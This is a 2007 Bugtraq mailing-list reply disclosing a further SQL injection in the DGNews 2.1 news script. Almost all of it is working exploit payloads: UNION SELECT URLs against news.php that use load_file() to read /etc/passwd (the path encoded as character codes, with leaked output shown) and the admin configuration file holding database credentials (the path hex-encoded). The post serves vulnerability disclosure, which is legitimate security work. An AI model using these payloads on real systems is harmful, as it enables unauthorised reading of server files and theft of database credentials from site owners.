
Date: 29 May 2007 06:43:19 -0000
From: laurent.gaffie@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: DGNews version 2.1 SQL Injection Vulnerability

hi there

there's also another sql injection on this script:
news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7%20from%20news_comment/*
//result: "This news has 1 comments. Please read, or post one by click here.
* 5 (by: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:..................."

read the database credentials plain text :
news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870),4,5,6,7%20from%20news_comment/*
//information is in the source code.
* 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870     = /usr/local/apache2/htdocs/dgnews/admin/conf.php 

ps: works regardless of php.ini settings .

regards laurent gaffie
